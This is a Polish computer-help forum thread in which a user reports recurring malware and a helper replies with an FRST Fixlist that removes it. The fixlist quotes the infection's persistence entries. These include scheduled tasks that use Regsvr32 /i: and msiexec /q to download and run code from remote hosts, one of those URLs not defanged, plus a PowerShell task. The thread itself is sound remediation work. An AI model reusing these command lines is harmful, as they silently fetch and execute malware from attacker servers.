Elektroda.pl
Elektroda.pl
X
Proszę, dodaj wyjątek www.elektroda.pl do Adblock.
Dzięki temu, że oglądasz reklamy, wspierasz portal i użytkowników.

pomoc w odwirusowaniu komputera - logi z FRST

madzgda20 27 Kwi 2017 19:43 276 1
  • #1 27 Kwi 2017 19:43
    madzgda20
    Poziom 3  

    Od pewnego czasu pojawia mi się na pulpicie zainstalowany program Mozilla Firefox, dopina się do paska zadań a Avast mówi, że zablokował zagrożenie w folderze "pliki programów(x86). Po usunięciu całego folderu problem wraca za kilka dni. Dodatkowo antywirus zablokował zagrożenia w folderze AppData/Local/Temp oraz jeszcze kilka wirusów.

    Załączam logi z FRST, lecz ostrzegam, że jestem totalną "blondynką" jeśli chodzi o wszelkie rzeczy związane z komputerami

    Bardzo proszę o pomoc.

    0 1
  • #2 27 Kwi 2017 20:44
    Kolobos
    Spec od komputerów

    Obok frst.exe utworz plik Fixlist.txt z zawartoscia:
    CloseProcesses:
    HKU\S-1-5-21-632428468-1387991804-2553007176-1001\...\ChromeHTML: -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.) <==== UWAGA
    Task: {0161464B-E858-49BE-B551-D8FCCA38D6D8} - \OfficeSoftwareProtectionPlatform\SvcRestartTask -> Brak pliku <==== UWAGA
    Task: {218B3F94-792E-4B64-A4A4-3862ED755BAA} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Brak pliku <==== UWAGA
    Task: {40269245-8879-4D3A-8D05-13B35AB0BA79} - \WPD\SqmUpload_S-1-5-21-632428468-1387991804-2553007176-1001 -> Brak pliku <==== UWAGA
    Task: {4111890E-94CF-4523-8154-B6598ED8CC9C} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Brak pliku <==== UWAGA
    Task: {43ACA834-BC1C-407B-BE1D-01F76E538A09} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-03-31] () <==== UWAGA
    Task: {452DA1CE-42B5-425A-880F-73052C012CFE} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj8xRTU5OYUxNWwcM8UyMdhYNUQYMUU4RkQXRWk2M8RYMc== scrobj.dll
    Task: {46231296-4E36-47F8-B0E5-A8717D86BFEC} - System32\Tasks\Windows-PG => powershell.exe C:\windows\psgo\psgo.ps1
    Task: {47E83A6A-E647-43F7-B683-093D9C3EB209} - System32\Tasks\magdaBrainstormChallisV2 => Rundll32.exe MultilayerThermoelectron.dll,main 7 1 <==== UWAGA
    Task: {9D97A2BC-BCDE-4848-A721-A30AFCAB2DE7} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Brak pliku <==== UWAGA
    Task: {E87B804B-DB8B-4AF1-8F3D-345114036BCB} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj8xRTU5OYUxNWwcM8UyMdhYNUQYMUU4RkQXRWk2M8RYMc== scrobj.dll
    Task: {E96F1179-282E-4855-AD7D-F39A2A2519FB} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Brak pliku <==== UWAGA
    Task: {F076310D-ED1E-4E04-BFDE-8F5680ED2D88} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Brak pliku <==== UWAGA
    Shortcut: C:\Users\magda\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.)
    Shortcut: C:\Users\magda\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.)
    Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.)
    Shortcut: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.)
    HKU\S-1-5-21-632428468-1387991804-2553007176-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj8xRTU5OYUxNWwcM8UyMdhYNUQYMUU4RkQXRWk2M8RYMc== /q




    HKU\S-1-5-21-632428468-1387991804-2553007176-1001\...\Policies\Explorer: []
    IFEO\taskmgr.exe: [Debugger]
    FF DefaultProfile: 1p27mi1y.default
    FF ProfilePath: C:\Users\magda\AppData\Roaming\Firefox\Firefox\Profiles\1p27mi1y.default [2017-04-27]
    FF Extension: (HSearch) - C:\Users\magda\AppData\Roaming\Firefox\Firefox\Profiles\1p27mi1y.default\Extensions\@E97YHOMI-FU8L-IM23-VUT9-RVDZT7M8XL8H.xpi [2017-04-21] [Brak podpisu cyfrowego]
    FF Extension: (FF Adr) - C:\Users\magda\AppData\Roaming\Firefox\Firefox\Profiles\1p27mi1y.default\Extensions\@H99KV4DO-UCCF-9PFO-9ZLK-8RRP4FVOKD9O.xpi [2017-04-19] [Brak podpisu cyfrowego]
    FF SearchPlugin: C:\Users\magda\AppData\Roaming\Firefox\Firefox\Profiles\1p27mi1y.default\searchplugins\startsearch.xml [2017-04-27]
    FF HKLM-x32\...\Thunderbird\Extensions: [msktbird@mcafee.com] - C:\Program Files\McAfee\MSK => nie znaleziono
    FF Plugin: @mcafee.com/MSC,version=10 -> C:\Program Files\mcafee\msc\npMcSnFFPl64.dll [Brak pliku]
    FF Plugin-x32: @mcafee.com/MSC,version=10 -> C:\Program Files (x86)\McAfee\msc\npMcSnFFPl.dll [Brak pliku]
    CHR HKLM-x32\...\Chrome\Extension: [daanglpcpkjjlkhcbladppjphglbigam] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - hxxps://clients2.google.com/service/update2/crx
    HKU\S-1-5-21-632428468-1387991804-2553007176-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.) <==== UWAGA
    R2 AppleNotificationsSrv; C:\ProgramData\Software\Apple\Apps\Notification.dll [106496 2017-04-17] () [Brak podpisu cyfrowego]
    R2 Kitty; C:\Users\magda\AppData\Local\Kitty\Kitty.dll [553472 2017-04-25] (kitty) [Brak podpisu cyfrowego] <==== UWAGA
    R2 SNARE; C:\Users\magda\AppData\Local\SNARE\Snare.dll [833536 2017-04-27] (InterSect Alliance Pty Ltd) [Brak podpisu cyfrowego]
    S2 FirefoxU; "C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe" [X] <==== UWAGA
    2017-04-27 12:25 - 2017-04-27 12:25 - 00003572 _____ C:\WINDOWS\System32\Tasks\Windows-PG
    2017-04-27 12:25 - 2017-04-27 12:25 - 00000000 ____D C:\WINDOWS\psgo
    2017-04-26 09:25 - 2017-04-27 12:33 - 00000000 _____ C:\WINDOWS\SysWOW64\44
    2017-04-26 09:21 - 2017-04-27 12:25 - 00000000 _____ C:\WINDOWS\SysWOW64\11
    2017-04-21 10:14 - 2017-04-21 10:14 - 00002830 _____ C:\WINDOWS\System32\Tasks\magdaBrainstormChallisV2
    2017-04-21 10:14 - 2017-04-21 10:14 - 00002762 _____ C:\WINDOWS\System32\Tasks\BacKGroundAgent
    2017-04-21 10:14 - 2017-04-21 10:14 - 00002632 _____ C:\WINDOWS\System32\Tasks\Windows-WoShiBeiYongDe
    2017-04-21 10:14 - 2017-04-21 10:14 - 00002618 _____ C:\WINDOWS\System32\Tasks\Milimili
    2017-04-21 10:14 - 2017-04-21 10:14 - 00002610 _____ C:\WINDOWS\System32\Tasks\PowerWord-SCT-JT
    2017-04-21 09:54 - 2017-04-21 09:54 - 00000000 ____D C:\Program Files (x86)\MK
    2017-04-21 09:50 - 2017-04-27 12:25 - 00034328 _____ (Sysinternals - www.sysinternals.com) C:\WINDOWS\system32\Drivers\PROCEXP152.SYS
    2017-04-19 14:03 - 2017-04-21 10:51 - 00000000 ____D C:\Users\magda\AppData\Local\3DM
    2017-04-19 14:03 - 2017-04-21 10:12 - 00000000 ____D C:\WINDOWS\system32\log
    2017-04-19 14:03 - 2017-04-19 14:03 - 00000000 ____D C:\Users\magda\AppData\Roaming\Mozilla
    2017-04-19 14:03 - 2017-04-19 14:03 - 00000000 ____D C:\Users\magda\AppData\Roaming\Firefox
    2017-04-19 14:03 - 2016-05-19 08:42 - 00052392 _____ (Elex do Brasil Participações Ltda) C:\WINDOWS\system32\Drivers\iSafeNetFilter.sys
    2017-04-19 13:59 - 2017-04-21 09:54 - 00000000 ____D C:\Program Files\MK
    2017-04-17 16:34 - 2017-04-21 10:43 - 00000000 ___DC C:\WINDOWS\Panther
    2017-04-17 16:08 - 2017-04-17 16:08 - 00000214 _____ C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job
    2017-04-17 15:42 - 2017-04-27 12:26 - 00000000 ____D C:\Users\magda\AppData\LocalLow\Mozilla
    2017-04-17 15:39 - 2017-04-27 12:26 - 00000000 _____ C:\Users\Public\Documents\temp.dat
    2017-04-17 15:39 - 2017-04-27 12:26 - 00000000 _____ C:\Users\Public\Documents\report.dat
    2017-04-17 15:39 - 2017-04-27 12:25 - 00000000 ____D C:\Users\magda\AppData\Local\Kitty
    2017-04-17 15:39 - 2017-04-17 15:39 - 00000000 ____D C:\Users\magda\AppData\Local\Firefox
    2017-04-17 15:39 - 2017-04-17 15:39 - 00000000 ____D C:\Users\magda\AppData\Local\Eastness
    2017-04-17 15:39 - 2017-04-17 15:39 - 00000000 ____D C:\ProgramData\Software
    2017-04-17 15:39 - 2017-04-17 15:39 - 00000000 ____D C:\Program Files (x86)\MIO
    2017-04-17 15:39 - 2017-04-17 15:39 - 00000000 ____D C:\Program Files (x86)\Eastness
    2017-04-17 15:38 - 2017-04-27 12:25 - 00000000 ____D C:\Users\magda\AppData\Local\SNARE
    2017-04-13 20:09 - 2017-04-13 20:09 - 00000000 ____D C:\Users\magda\AppData\Roaming\SSMgre
    EmptyTemp:

    W FRST wybierz Napraw.

    0